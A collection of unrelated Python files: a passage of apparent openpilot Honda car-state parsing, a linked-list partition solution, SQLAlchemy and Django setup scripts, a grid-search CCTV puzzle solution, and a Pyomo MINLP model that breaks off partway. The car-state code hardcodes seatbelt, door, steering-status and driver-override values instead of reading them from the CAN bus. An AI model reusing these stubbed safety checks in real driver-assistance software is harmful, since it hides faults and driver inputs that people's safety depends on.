("LEFT_BLINKER", "SCM_FEEDBACK", 0),
("RIGHT_BLINKER", "SCM_FEEDBACK", 0),
#("GEAR", "GEARBOX", 0),
#("SEATBELT_DRIVER_LAMP", "SEATBELT_STATUS", 1),
#("SEATBELT_DRIVER_LATCHED", "SEATBELT_STATUS", 0),
("BRAKE_PRESSED", "POWERTRAIN_DATA", 0),
#("BRAKE_SWITCH", "POWERTRAIN_DATA", 0),
("CRUISE_BUTTONS", "SCM_BUTTONS", 0),
("MAIN_ON", "SCM_BUTTONS", 0),
#("ESP_DISABLED", "VSA_STATUS", 1),
#("USER_BRAKE", "VSA_STATUS", 0),
#("BRAKE_HOLD_ACTIVE", "VSA_STATUS", 0),
#("STEER_STATUS", "STEER_STATUS", 5),
#("GEAR_SHIFTER", "GEARBOX", 0),
("PEDAL_GAS", "POWERTRAIN_DATA", 0),
("CRUISE_SETTING", "SCM_BUTTONS", 0),
("CRUISE_SPEED_PCM", "CRUISE", 0 ),
#("ACC_STATUS", "POWERTRAIN_DATA", 0),
]
checks = [
# ("ENGINE_DATA", 100),
# ("WHEEL_SPEEDS", 50),
# ("STEERING_SENSORS", 100),
# ("SEATBELT_STATUS", 10),
# ("CRUISE", 10),
# ("POWERTRAIN_DATA", 100),
# ("VSA_STATUS", 50),
]
return signals, checks
def get_can_parser(CP):
signals, checks = get_can_signals(CP)
bus_pt = 1 if CP.isPandaBlack and not CP.carFingerprint in HONDA_BOSCH else 0
return CANParser(DBC[CP.carFingerprint]['pt'], signals, checks, bus_pt)
def get_cam_can_parser(CP):
signals = []
checks = []
# all hondas except CRV, RDX and 2019 Odyssey@China use 0xe4 for steering
#checks = [(0x158, 100)]
#if CP.carFingerprint in [CAR.CRV, CAR.ACURA_RDX, CAR.ODYSSEY_CHN]:
# checks = [(0x194, 100)]
bus_cam = 0 # if CP.carFingerprint in HONDA_BOSCH and not CP.isPandaBlack else 2
return CANParser(DBC[CP.carFingerprint]['pt'], signals, checks, bus_cam)
class CarState():
def __init__(self, CP):
self.CP = CP
self.can_define = CANDefine(DBC[CP.carFingerprint]['pt'])
#self.shifter_values = self.can_define.dv["GEARBOX"]["GEAR_SHIFTER"]
self.steer_status_values = defaultdict(lambda: "UNKNOWN", self.can_define.dv["STEER_STATUS"]["STEER_STATUS"])
self.user_gas, self.user_gas_pressed = 0., 0
self.brake_switch_prev = 0
self.brake_switch_ts = 0
self.cruise_buttons = 0
self.cruise_setting = 0
self.v_cruise_pcm_prev = 0
self.blinker_on = 0
self.left_blinker_on = 0
self.right_blinker_on = 0
self.cruise_mode = 0
self.stopped = 0
# vEgo kalman filter
dt = 0.01
# Q = np.matrix([[10.0, 0.0], [0.0, 100.0]])
# R = 1e3
self.v_ego_kf = KF1D(x0=[[0.0], [0.0]],
A=[[1.0, dt], [0.0, 1.0]],
C=[1.0, 0.0],
K=[[0.12287673], [0.29666309]])
self.v_ego = 0.0
def update(self, cp, cp_cam):
# car params
v_weight_v = [0., 1.] # don't trust smooth speed at low values to avoid premature zero snapping
v_weight_bp = [1., 6.] # smooth blending, below ~0.6m/s the smooth speed snaps to zero
# update prevs, update must run once per loop
self.prev_cruise_buttons = self.cruise_buttons
self.prev_cruise_setting = self.cruise_setting
self.prev_blinker_on = self.blinker_on
self.prev_left_blinker_on = self.left_blinker_on
self.prev_right_blinker_on = self.right_blinker_on
# ******************* parse out can *******************
self.door_all_closed = True # not any([cp.vl["DOORS_STATUS"]['DOOR_OPEN_FL'], cp.vl["DOORS_STATUS"]['DOOR_OPEN_FR'],
# cp.vl["DOORS_STATUS"]['DOOR_OPEN_RL'], cp.vl["DOORS_STATUS"]['DOOR_OPEN_RR']])
self.seatbelt = True #not cp.vl["SEATBELT_STATUS"]['SEATBELT_DRIVER_LAMP'] and cp.vl["SEATBELT_STATUS"]['SEATBELT_DRIVER_LATCHED']
steer_status = 'NORMAL' #self.steer_status_values[0]#cp.vl["STEER_STATUS"]['STEER_STATUS']]
self.steer_error = steer_status not in ['NORMAL', 'NO_TORQUE_ALERT_1', 'NO_TORQUE_ALERT_2', 'LOW_SPEED_LOCKOUT', 'TMP_FAULT']
# NO_TORQUE_ALERT_2 can be caused by bump OR steering nudge from driver
self.steer_not_allowed = steer_status not in ['NORMAL', 'NO_TORQUE_ALERT_2']
# LOW_SPEED_LOCKOUT is not worth a warning
self.steer_warning = steer_status not in ['NORMAL', 'LOW_SPEED_LOCKOUT', 'NO_TORQUE_ALERT_2']
self.brake_error = 0
# calc best v_ego estimate, by averaging two opposite corners
speed_factor = SPEED_FACTOR[self.CP.carFingerprint]
self.v_wheel_fl = cp.vl["WHEEL_SPEEDS"]['WHEEL_SPEED_FL'] * CV.KPH_TO_MS * speed_factor
self.v_wheel_fr = cp.vl["WHEEL_SPEEDS"]['WHEEL_SPEED_FR'] * CV.KPH_TO_MS * speed_factor
self.v_wheel_rl = cp.vl["WHEEL_SPEEDS"]['WHEEL_SPEED_RL'] * CV.KPH_TO_MS * speed_factor
self.v_wheel_rr = cp.vl["WHEEL_SPEEDS"]['WHEEL_SPEED_RR'] * CV.KPH_TO_MS * speed_factor
v_wheel = (self.v_wheel_fl + self.v_wheel_fr + self.v_wheel_rl + self.v_wheel_rr)/4.
# blend in transmission speed at low speed, since it has more low speed accuracy
self.v_weight = interp(v_wheel, v_weight_bp, v_weight_v)
speed = (1. - self.v_weight) * cp.vl["ENGINE_DATA"]['XMISSION_SPEED'] * CV.KPH_TO_MS * speed_factor + \
self.v_weight * v_wheel
if abs(speed - self.v_ego) > 2.0: # Prevent large accelerations when car starts at non zero speed
self.v_ego_kf.x = [[speed], [0.0]]
self.v_ego_raw = speed
v_ego_x = self.v_ego_kf.update(speed)
self.v_ego = float(v_ego_x[0])
self.a_ego = float(v_ego_x[1])
self.standstill = self.v_ego_raw < 0.01 #not cp.vl["STANDSTILL"]['WHEELS_MOVING']
self.pedal_gas = cp.vl["POWERTRAIN_DATA"]['PEDAL_GAS']
# this is a hack for the interceptor. This is now only used in the simulation
# TODO: Replace tests by toyota so this can go away
if self.CP.enableGasInterceptor:
self.user_gas = (cp.vl["GAS_SENSOR"]['INTERCEPTOR_GAS'] + cp.vl["GAS_SENSOR"]['INTERCEPTOR_GAS2']) / 2.
self.user_gas_pressed = self.user_gas > 0 # this works because interceptor read < 0 when pedal position is 0. Once calibrated, this will change
self.user_gas_pressed = self.pedal_gas > 0
#self.gear = 0 if self.CP.carFingerprint == CAR.CIVIC else cp.vl["GEARBOX"]['GEAR']
self.angle_steers = cp.vl["STEERING_SENSORS"]['STEER_ANGLE']
self.angle_steers_rate = cp.vl["STEERING_SENSORS"]['STEER_ANGLE_RATE']
self.cruise_setting = cp.vl["SCM_BUTTONS"]['CRUISE_SETTING']
self.cruise_buttons = cp.vl["SCM_BUTTONS"]['CRUISE_BUTTONS']
self.blinker_on = cp.vl["SCM_FEEDBACK"]['LEFT_BLINKER'] or cp.vl["SCM_FEEDBACK"]['RIGHT_BLINKER']
self.left_blinker_on = cp.vl["SCM_FEEDBACK"]['LEFT_BLINKER']
self.right_blinker_on = cp.vl["SCM_FEEDBACK"]['RIGHT_BLINKER']
#self.brake_hold = cp.vl["VSA_STATUS"]['BRAKE_HOLD_ACTIVE']
self.park_brake = 0 # TODO
self.main_on = cp.vl["SCM_BUTTONS"]['MAIN_ON']
#can_gear_shifter = int(cp.vl["GEARBOX"]['GEAR_SHIFTER'])
self.gear_shifter = 'drive' #parse_gear_shifter(can_gear_shifter, self.shifter_values)
self.car_gas = cp.vl["POWERTRAIN_DATA"]['PEDAL_GAS']
self.steer_torque_driver = 0 #cp.vl["STEER_STATUS"]['STEER_TORQUE_SENSOR']
self.steer_torque_motor = 0 #cp.vl["STEER_STATUS"]['STEER_TORQUE_MOTOR']
self.steer_override = False #abs(self.steer_torque_driver) > STEER_THRESHOLD[self.CP.carFingerprint]
#self.brake_switch = cp.vl["POWERTRAIN_DATA"]['BRAKE_SWITCH']
#self.cruise_speed_offset = calc_cruise_offset(cp.vl["CRUISE_PARAMS"]['CRUISE_SPEED_OFFSET'], self.v_ego)
self.v_cruise_pcm = cp.vl["CRUISE"]['CRUISE_SPEED_PCM']
self.brake_pressed = cp.vl["POWERTRAIN_DATA"]['BRAKE_PRESSED']
self.user_brake = 0 #cp.vl["VSA_STATUS"]['USER_BRAKE']
#self.pcm_acc_status = cp.vl["POWERTRAIN_DATA"]['ACC_STATUS']
|
class Solution:
# @param A : head node of linked list
# @param B : integer
# @return the head node in the linked list
def partition(self, A, B):
head0 = None
tail0 = None
head1 = None
tail1 = None
ptr = A
while ptr is not None :
ptr2 = ptr.next
ptr.next = None
if ptr.val < B :
if head0 is None :
head0 = ptr
tail0 = ptr
else :
tail0.next = ptr
tail0 = ptr
else :
if head1 is None :
head1 = ptr
tail1 = ptr
else :
tail1.next = ptr
tail1 = ptr
ptr = ptr2
if tail0 is not None :
tail0.next = head1
return head0 if head0 is not None else head1
|
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
SQLALCHEMY_DATABASE_URI = 'sqlite:///todolist.sqlite'
_engine = create_engine(
SQLALCHEMY_DATABASE_URI, connect_args={"check_same_thread": False}
)
_session_local = sessionmaker(autocommit=False, autoflush=False, bind=_engine)
_base = declarative_base()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Management command entry point for working with migrations
"""
import sys
import django
from django.conf import settings
INSTALLED_APPS = [
"django.contrib.auth",
"django.contrib.admin",
"django.contrib.contenttypes",
"django.contrib.sites",
"addendum",
]
try:
import south # noqa
except ImportError:
pass
else:
INSTALLED_APPS += ['south']
settings.configure(
DEBUG=True,
USE_TZ=True,
USE_I18N=True,
DATABASES={
"default": {
"ENGINE": "django.db.backends.sqlite3",
}
},
MIDDLEWARE_CLASSES=(), # Silence Django 1.7 warnings
SITE_ID=1,
FIXTURE_DIRS=['tests/fixtures'],
INSTALLED_APPS=INSTALLED_APPS,
ROOT_URLCONF="tests.urls",
)
try:
django.setup()
except AttributeError:
pass
if __name__ == '__main__':
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
# BOJ 15683
# surveillance
from copy import deepcopy
import sys
sys.setrecursionlimit(100000)
dx = (0, 1, 0, -1)
dy = (1, 0, -1, 0)
dir = [[], [[0], [1], [2], [3]], [[0, 2], [1, 3]], [[1, 0], [1, 2], [3, 0], [3, 2]], [[0, 1, 2], [1, 2, 3], [0, 2, 3],[0, 1, 3]], [[0, 1, 2, 3]]]
n, m = map(int, input().split())
office = []
cctv = []
total_cctv = 0
for i in range(n):
office.append(list(map(int, input().split())))
for j in range(m):
if office[i][j] != 0 and office[i][j] != 6:
total_cctv += 1
cctv.append([i, j])
res = 1e9
def safe(cctv_map):
score = 0
for i in range(n):
for j in range(m):
if cctv_map[i][j] == 0:
score += 1
return score
def surveil(x, y, d, target_map):
for i in d:
nx = x
ny = y
while True:
nx += dx[i]
ny += dy[i]
if 0 <= nx < n and 0 <= ny < m:
if target_map[nx][ny] == 0:
target_map[nx][ny] = 7
elif target_map[nx][ny] == 6:
break
else:
break
def dfs(cnt, office_now):
global res
tmp = deepcopy(office_now)
if cnt == total_cctv:
res = min(res, safe(tmp))
return
x, y = cctv[cnt]
for d in dir[office[x][y]]:
surveil(x, y, d, tmp)
dfs(cnt+1, tmp)
tmp = deepcopy(office_now)
dfs(0, office)
print(res)
|
# MINLP written by GAMS Convert at 04/21/18 13:51:42
#
# Equation counts
# Total E G L N X C B
# 215 33 149 33 0 0 0 0
#
# Variable counts
# x b i s1s s2s sc si
# Total cont binary integer sos1 sos2 scont sint
# 154 62 92 0 0 0 0 0
# FX 0 0 0 0 0 0 0 0
#
# Nonzero counts
# Total const NL DLL
# 742 713 29 0
#
# Reformulation has removed 1 variable and 1 equation
from pyomo.environ import *
model = m = ConcreteModel()
m.x1 = Var(within=Reals,bounds=(4.60517018598809,8.00636756765025),initialize=4.60517018598809)
m.x2 = Var(within=Reals,bounds=(4.60517018598809,8.00636756765025),initialize=4.60517018598809)
m.x3 = Var(within=Reals,bounds=(4.60517018598809,8.00636756765025),initialize=4.60517018598809)
m.x4 = Var(within=Reals,bounds=(4.60517018598809,8.00636756765025),initialize=4.60517018598809)
m.x5 = Var(within=Reals,bounds=(4.60517018598809,8.00636756765025),initialize=4.60517018598809)
m.x6 = Var(within=Reals,bounds=(4.60517018598809,8.00636756765025),initialize=4.60517018598809)
m.x7 = Var(within=Reals,bounds=(4.60517018598809,8.00636756765025),initialize=4.60517018598809)
m.x8 = Var(within=Reals,bounds=(4.60517018598809,8.00636756765025),initialize=4.60517018598809)
m.x9 = Var(within=Reals,bounds=(1.6094379124341,6.90775527898214),initialize=4.25859659570812)
m.x10 = Var(within=Reals,bounds=(1.6094379124341,6.90775527898214),initialize=4.25859659570812)
m.x11 = Var(within=Reals,bounds=(1.6094379124341,6.90775527898214),initialize=4.25859659570812)
m.x12 = Var(within=Reals,bounds=(1.6094379124341,6.90775527898214),initialize=4.25859659570812)
m.x13 = Var(within=Reals,bounds=(1.6094379124341,6.90775527898214),initialize=4.25859659570812)
m.x14 = Var(within=Reals,bounds=(1.6094379124341,6.90775527898214),initialize=4.25859659570812)
m.x15 = Var(within=Reals,bounds=(1.6094379124341,6.90775527898214),initialize=4.25859659570812)
m.x16 = Var(within=Reals,bounds=(1.6094379124341,6.90775527898214),initialize=4.25859659570812)
m.x17 = Var(within=Reals,bounds=(1.6094379124341,6.84321675784456),initialize=4.22632733513933)
m.x18 = Var(within=Reals,bounds=(1.6094379124341,6.84321675784456),initialize=4.22632733513933)
m.x19 = Var(within=Reals,bounds=(1.6094379124341,6.84321675784456),initialize=4.22632733513933)
m.x20 = Var(within=Reals,bounds=(1.6094379124341,6.84321675784456),initialize=4.22632733513933)
m.x21 = Var(within=Reals,bounds=(1.6094379124341,6.84321675784456),initialize=4.22632733513933)
m.x22 = Var(within=Reals,bounds=(1.6094379124341,6.84321675784456),initialize=4.22632733513933)
m.x23 = Var(within=Reals,bounds=(1.6094379124341,6.84321675784456),initialize=4.22632733513933)
m.x24 = Var(within=Reals,bounds=(1.6094379124341,6.84321675784456),initialize=4.22632733513933)
m.x25 = Var(within=Reals,bounds=(2.30258509299405,6.84321675784456),initialize=4.57290092541931)
m.x26 = Var(within=Reals,bounds=(2.30258509299405,6.84321675784456),initialize=4.57290092541931)
m.x27 = Var(within=Reals,bounds=(2.30258509299405,6.84321675784456),initialize=4.57290092541931)
m.x28 = Var(within=Reals,bounds=(2.30258509299405,6.84321675784456),initialize=4.57290092541931)
m.x29 = Var(within=Reals,bounds=(2.30258509299405,6.84321675784456),initialize=4.57290092541931)
m.x30 = Var(within=Reals,bounds=(2.30258509299405,6.84321675784456),initialize=4.57290092541931)
m.x31 = Var(within=Reals,bounds=(2.30258509299405,6.84321675784456),initialize=4.57290092541931)
m.x32 = Var(within=Reals,bounds=(2.30258509299405,6.84321675784456),initialize=4.57290092541931)
m.x33 = Var(within=Reals,bounds=(1.6094379124341,6.62007320653036),initialize=4.11475555948223)
m.x34 = Var(within=Reals,bounds=(1.6094379124341,6.62007320653036),initialize=4.11475555948223)
m.x35 = Var(within=Reals,bounds=(1.6094379124341,6.62007320653036),initialize=4.11475555948223)
m.x36 = Var(within=Reals,bounds=(1.6094379124341,6.62007320653036),initialize=4.11475555948223)
m.x37 = Var(within=Reals,bounds=(1.6094379124341,6.62007320653036),initialize=4.11475555948223)
m.x38 = Var(within=Reals,bounds=(1.6094379124341,6.62007320653036),initialize=4.11475555948223)
m.x39 = Var(within=Reals,bounds=(1.6094379124341,6.62007320653036),initialize=4.11475555948223)
m.x40 = Var(within=Reals,bounds=(1.6094379124341,6.62007320653036),initialize=4.11475555948223)
m.x41 = Var(within=Reals,bounds=(0,1.38629436111989),initialize=0)
m.x42 = Var(within=Reals,bounds=(0,1.38629436111989),initialize=0)
m.x43 = Var(within=Reals,bounds=(0,1.38629436111989),initialize=0)
m.x44 = Var(within=Reals,bounds=(0,1.38629436111989),initialize=0)
m.x45 = Var(within=Reals,bounds=(0,1.38629436111989),initialize=0)
m.x46 = Var(within=Reals,bounds=(0,1.38629436111989),initialize=0)
m.x47 = Var(within=Reals,bounds=(0,1.38629436111989),initialize=0)
m.x48 = Var(within=Reals,bounds=(0,1.38629436111989),initialize=0)
m.x49 = Var(within=Reals,bounds=(0,1.38629436111989),initialize=0.693147180559945)
m.x50 = Var(within=Reals,bounds=(0,1.38629436111989),initialize=0.693147180559945)
m.x51 = Var(within=Reals,bounds=(0,1.38629436111989),initialize=0.693147180559945)
m.x52 = Var(within=Reals,bounds=(0,1.38629436111989),initialize=0.693147180559945)
m.x53 = Var(within=Reals,bounds=(0,1.38629436111989),initialize=0.693147180559945)
m.x54 = Var(within=Reals,bounds=(0,1.38629436111989),initialize=0.693147180559945)
m.x55 = Var(within=Reals,bounds=(0,1.38629436111989),initialize=0.693147180559945)
m.x56 = Var(within=Reals,bounds=(0,1.38629436111989),initialize=0.693147180559945)
m.x58 = Var(within=Reals,bounds=(4.60517018598809,9.61580548008435),initialize=7.11048783303622)
m.x59 = Var(within=Reals,bounds=(None,100),initialize=0)
m.x60 = Var(within=Reals,bounds=(None,100),initialize=0)
m.x61 = Var(within=Reals,bounds=(None,100),initialize=0)
m.x62 = Var(within=Reals,bounds=(None,100),initialize=0)
m.b63 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b64 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b65 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b66 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b67 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b68 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b69 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b70 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b71 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b72 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b73 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b74 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b75 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b76 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b77 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b78 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b79 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b80 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b81 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b82 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b83 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b84 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b85 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b86 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b87 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b88 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b89 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b90 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b91 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b92 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b93 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b94 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b95 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b96 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b97 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b98 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b99 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b100 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b101 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b102 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b103 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b104 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b105 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b106 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b107 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b108 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b109 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b110 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b111 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b112 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b113 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b114 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b115 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b116 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b117 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b118 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b119 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b120 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b121 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b122 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b123 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b124 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b125 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b126 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b127 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b128 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b129 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b130 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b131 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b132 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b133 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b134 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b135 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b136 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b137 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b138 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b139 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b140 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b141 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b142 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b143 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b144 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b145 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b146 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b147 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b148 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b149 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b150 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b151 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b152 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b153 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b154 = Var(within=Binary,bounds=(0,1),initialize=0)
m.obj = Objective(expr=592*exp(0.65*m.x1 + m.x41 + m.x49) + 582*exp(0.59*m.x2 + m.x42 + m.x50) + 1200*exp(0.52*m.x3 +
m.x43 + m.x51) + 200*exp(0.7*m.x4 + m.x44 + m.x52) + 582*exp(0.39*m.x5 + m.x45 + m.x53) + 850*
exp(0.8*m.x6 + m.x46 + m.x54) + 592*exp(0.65*m.x7 + m.x47 + m.x55) + 1200*exp(0.52*m.x8 + m.x48
+ m.x56) + 150*exp(0.5*m.x58), sense=minimize)
m.c1 = Constraint(expr= m.x1 - m.x9 + m.x41 >= 0.993251773010283)
m.c2 = Constraint(expr= m.x2 - m.x10 + m.x42 >= 0.336472236621213)
m.c3 = Constraint(expr= m.x3 - m.x11 + m.x43 >= 0.182321556793955)
m.c4 = Constraint(expr= m.x4 - m.x12 + m.x44 >= 0.53062825106217)
m.c5 = Constraint(expr= m.x5 - m.x13 + m.x45 >= 0.741937344729377)
m.c6 = Constraint(expr= m.x6 - m.x14 + m.x46 >= 1.09861228866811)
m.c7 = Constraint(expr= m.x7 - m.x15 + m.x47 >= 0.587786664902119)
m.c8 = Constraint(expr= m.x8 - m.x16 + m.x48 >= 0.8754687373539)
m.c9 = Constraint(expr= m.x1 - m.x17 + m.x41 >= 0.587786664902119)
m.c10 = Constraint(expr= m.x2 - m.x18 + m.x42 >= 0.0953101798043249)
m.c11 = Constraint(expr= m.x3 - m.x19 + m.x43 >= 0.741937344729377)
m.c12 = Constraint(expr= m.x4 - m.x20 + m.x44 >= 0.78845736036427)
m.c13 = Constraint(expr= m.x5 - m.x21 + m.x45 >= 1.09861228866811)
m.c14 = Constraint(expr= m.x6 - m.x22 + m.x46 >= 1.1314021114911)
m.c15 = Constraint(expr= m.x7 - m.x23 + m.x47 >= 0.8754687373539)
m.c16 = Constraint(expr= m.x8 - m.x24 + m.x48 >= 1.16315080980568)
m.c17 = Constraint(expr= m.x1 - m.x25 + m.x41 >= 1.16315080980568)
m.c18 = Constraint(expr= m.x2 - m.x26 + m.x42 >= 0.0953101798043249)
m.c19 = Constraint(expr= m.x3 - m.x27 + m.x43 >= 0.182321556793955)
m.c20 = Constraint(expr= m.x4 - m.x28 + m.x44 >= -0.105360515657826)
m.c21 = Constraint(expr= m.x5 - m.x29 + m.x45 >= 0.262364264467491)
m.c22 = Constraint(expr= m.x6 - m.x30 + m.x46 >= 0.8754687373539)
m.c23 = Constraint(expr= m.x7 - m.x31 + m.x47 >= 0.916290731874155)
m.c24 = Constraint(expr= m.x8 - m.x32 + m.x48 >= -0.105360515657826)
m.c25 = Constraint(expr= m.x1 - m.x33 + m.x41 >= 1.1314021114911)
m.c26 = Constraint(expr= m.x2 - m.x34 + m.x42 >= 1.38629436111989)
m.c27 = Constraint(expr= m.x3 - m.x35 + m.x43 >= 1.16315080980568)
m.c28 = Constraint(expr= m.x4 - m.x36 + m.x44 >= 0.182321556793955)
m.c29 = Constraint(expr= m.x5 - m.x37 + m.x45 >= 0.8754687373539)
m.c30 = Constraint(expr= m.x6 - m.x38 + m.x46 >= 0.993251773010283)
m.c31 = Constraint(expr= m.x7 - m.x39 + m.x47 >= 1.06471073699243)
m.c32 = Constraint(expr= m.x8 - m.x40 + m.x48 >= 1.1314021114911)
m.c33 = Constraint(expr= m.x9 + m.x49 + m.x59 >= 1.09861228866811)
m.c34 = Constraint(expr= m.x10 + m.x50 + m.x59 >= 0.693147180559945)
m.c35 = Constraint(expr= m.x11 + m.x51 + m.x59 >= 0.693147180559945)
m.c36 = Constraint(expr= m.x12 + m.x52 + m.x59 >= 0)
m.c37 = Constraint(expr= m.x13 + m.x53 + m.x59 >= 1.38629436111989)
m.c38 = Constraint(expr= m.x14 + m.x54 + m.x59 >= 0)
m.c39 = Constraint(expr= m.x15 + m.x55 + m.x59 >= 1.09861228866811)
m.c40 = Constraint(expr= m.x16 + m.x56 + m.x59 >= 0.693147180559945)
m.c41 = Constraint(expr= m.x17 + m.x49 + m.x60 >= 0.693147180559945)
m.c42 = Constraint(expr= m.x18 + m.x50 + m.x60 >= 1.38629436111989)
m.c43 = Constraint(expr= m.x19 + m.x51 + m.x60 >= 0)
m.c44 = Constraint(expr= m.x20 + m.x52 + m.x60 >= 1.09861228866811)
m.c45 = Constraint(expr= m.x21 + m.x53 + m.x60 >= 1.6094379124341)
m.c46 = Constraint(expr= m.x22 + m.x54 + m.x60 >= 0.693147180559945)
m.c47 = Constraint(expr= m.x23 + m.x55 + m.x60 >= 1.38629436111989)
m.c48 = Constraint(expr= m.x24 + m.x56 + m.x60 >= 1.79175946922805)
m.c49 = Constraint(expr= m.x25 + m.x49 + m.x61 >= 1.79175946922805)
m.c50 = Constraint(expr= m.x26 + m.x50 + m.x61 >= 0.693147180559945)
m.c51 = Constraint(expr= m.x27 + m.x51 + m.x61 >= 0.693147180559945)
m.c52 = Constraint(expr= m.x28 + m.x52 + m.x61 >= 0.693147180559945)
m.c53 = Constraint(expr= m.x29 + m.x53 + m.x61 >= 1.09861228866811)
m.c54 = Constraint(expr= m.x30 + m.x54 + m.x61 >= 1.6094379124341)
m.c55 = Constraint(expr= m.x31 + m.x55 + m.x61 >= 0.693147180559945)
m.c56 = Constraint(expr= m.x32 + m.x56 + m.x61 >= 1.38629436111989)
m.c57 = Constraint(expr= m.x33 + m.x49 + m.x62 >= 0.693147180559945)
m.c58 = Constraint(expr= m.x34 + m.x50 + m.x62 >= 1.09861228866811)
m.c59 = Constraint(expr= m.x35 + m.x51 + m.x62 >= 1.79175946922805)
m.c60 = Constraint(expr= m.x36 + m.x52 + m.x62 >= 1.6094379124341)
m.c61 = Constraint(expr= m.x37 + m.x53 + m.x62 >= 1.38629436111989)
m.c62 = Constraint(expr= m.x38 + m.x54 + m.x62 >= 0.693147180559945)
m.c63 = Constraint(expr= m.x39 + m.x55 + m.x62 >= 0.693147180559945)
m.c64 = Constraint(expr= m.x40 + m.x56 + m.x62 >= 1.09861228866811)
m.c65 = Constraint(expr=30000*exp(m.x59) + 20000*exp(m.x60) + 40000*exp(m.x61) + 20000*exp(m.x62) <= 6000)
m.c66 = Constraint(expr= - m.x10 + m.x58 - 10*m.b127 >= -8.61370563888011)
m.c67 = Constraint(expr= - m.x11 + m.x58 - 10*m.b128 >= -8.61370563888011)
m.c68 = Constraint(expr= - m.x12 + m.x58 - 10*m.b129 >= -8.61370563888011)
m.c69 = Constraint(expr= - m.x13 + m.x58 - 10*m.b130 >= -8.61370563888011)
m.c70 = Constraint(expr= - m.x14 + m.x58 - 10*m.b131 >= -8.61370563888011)
m.c71 = Constraint(expr= - m.x15 + m.x58 - 10*m.b132 >= -8.61370563888011)
